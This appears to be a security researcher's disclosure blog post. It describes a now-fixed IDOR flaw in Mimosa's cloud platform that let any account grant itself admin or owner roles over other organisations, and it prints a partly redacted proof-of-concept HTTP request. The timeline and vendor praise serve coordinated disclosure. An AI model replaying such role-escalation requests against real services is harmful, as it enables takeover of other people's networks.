Mimosa Cloud. Invite friends, not hackers

TL;DR

• Global wireless network provider had an IDOR in their cloud management platform
• Anyone can create an account, anyone can upgrade that account to take control of anyone else’s devices
• Excellent VDP, responded to promptly
• Fixed in ONE WORKING DAY!
• Other vendors can learn from Mimosa

Who?

Mimosa (https://mimosa.co/) deliver products and services for wireless internet and network provision, such as in rural and remote areas. They’re a subsidiary of the telco equipment company AirSpan after being acquired in November 2018 and their stuff is available around the world. They have a huge customer and user base.

So what was the problem?

Mimosa’s Cloud services allow providers to manage their Wi-Fi devices and all the things that come with running Wi-Fi services for a big user base.

Anyone can set up an account in a couple of steps here https://cloud.mimosa.co/app/welcome.html:

Once you’ve set that account up you can ‘Invite A Friend’, for example to give your partner access to Wi-Fi management. They just need to set up an account, then you can add them to yours.

The problem was that the API had an IDOR which could allow a user to control ALL available actions for other users across the entire platform.

This meant that anyone could access other people in other organisations and grant them permissions e.g. making them an Admin or even worse an Owner.

The profit here is that an attacker could take down the entire network, or potentially intercept users traffic and personal data.

Here is an example request showing the issue, where the xxxx ID at the bottom is an incremental integer which is not being properly checked:

POST /xxxxxx/users/registration HTTP/1.1
Host: cloud.mimosa.co
Connection: close
Content-Length: 1632
Accept: application/json, text/plain, */*
Origin: https://cloud.mimosa.co
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36
Content-Type: application/json;charset=UTF-8
Referer: https://cloud.mimosa.co/app/index.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: AWSELB=D7CF63AD18F3B00EA749905FAA1464230DEFEBBCB2A918DFB26D12071FE2CA278F93E8D33142E5E0EC74B0E82086D077B38B76E072C794BA16AC9F93589D354EE32A20D0CE; AWSELBCORS=D7CF63AD18F3B00EA749905FAA1464230DEFEBBCB2A918DFB26D12071FE2CA278F93E8D33142E5E0EC74B0E82086D077B38B76E072C794BA16AC9F93589D354EE32A20D0CE; _ga=GA1.2.1900219929.1596706322; _gid=GA1.2.1932711735.1596706322; JSESSIONID=76380F4C99628A27690898F17EEAD94A; tz1="UTC,UTC,0"; ajs_user_id=null; ajs_group_id=null; ajs_anonymous_id=%22a487a1f7-08be-499f-ac8c-712091809c77%22; __zlcmid=zYjL5e7KihRcnE

{"username":"[email protected]","orgs":[{"id":xxxx,"created":null,"modified":null,"createdBy":null,"modifiedBy":null,"name":"Vangelis_Stykas","description":"Default personal org","country":null,"timeZone":null,"address":null,"zip":null,"province":null,"countries":[{"id":101180,"created":null,"modified":null,"createdBy":null,"modifiedBy":null,"code":"GR","name":"Greece","companyName":"No Company","address":null,"address2":null,"city":null,"province":null,"zip":null,"check":null,"licensed":null,"isDefault":false,"additionalData":{}}],"timezone":null,"defaultCountry":null,"orgType":"Other","companyName":null,"dateTimeFormat":"MMM dd yyyy hh:mm a (z)","deleted":false,"deviceEventsEnabled":null,"suppressNotifications":false}],"password":"xxxxxxxxxxxxxxxx","roles":[{"role":"ADMIN","organization":{"id":xxxxx,"created":null,"modified":null,"createdBy":null,"modifiedBy":null,"name":"Vangelis_Stykas","description":"Default personal org","country":null,"timeZone":null,"address":null,"zip":null,"province":null,"countries":[{"id":101180,"created":null,"modified":null,"createdBy":null,"modifiedBy":null,"code":"GR","name":"Greece","companyName":"No Company","address":null,"address2":null,"city":null,"province":null,"zip":null,"check":null,"licensed":null,"isDefault":false,"additionalData":{}}],"timezone":null,"defaultCountry":null,"orgType":"Other","companyName":null,"dateTimeFormat":"MMM dd yyyy hh:mm a (z)","deleted":false,"deviceEventsEnabled":null,"suppressNotifications":false},"permissions":["DESIGN_TOOL_WRITE","ORG_WRITE","ORG_READ","DESIGN_TOOL_READ","NETWORK_WRITE","ORG_WRITE","ORG_READ","NETWORK_READ"]}]}

Disclosure timeline

Friday 7^th August 2020 – We contacted Mimosa to alert them to the issue. They quickly set up a support session to receive details and clarify some points

Monday 10^th August 2020 – Mimosa replied to say the issue had been fixed, and the update to Mimosa Network Management System version 2.8.1.4 had been pushed out.

It took them one working day to fix the problem

Conclusion

What a cool vendor.

Dealing with Mimosa with this vulnerability disclosure was an absolute pleasure. They adhere to their vulnerability disclosure programme, showing a level of care for their customers that many vendors do not.

Remember, a vulnerability disclosure programme isn’t just a page on a web site – it’s how you respond to the report, how you empower your team to actually get vulnerabilities fixed and how you protect your customers quickly.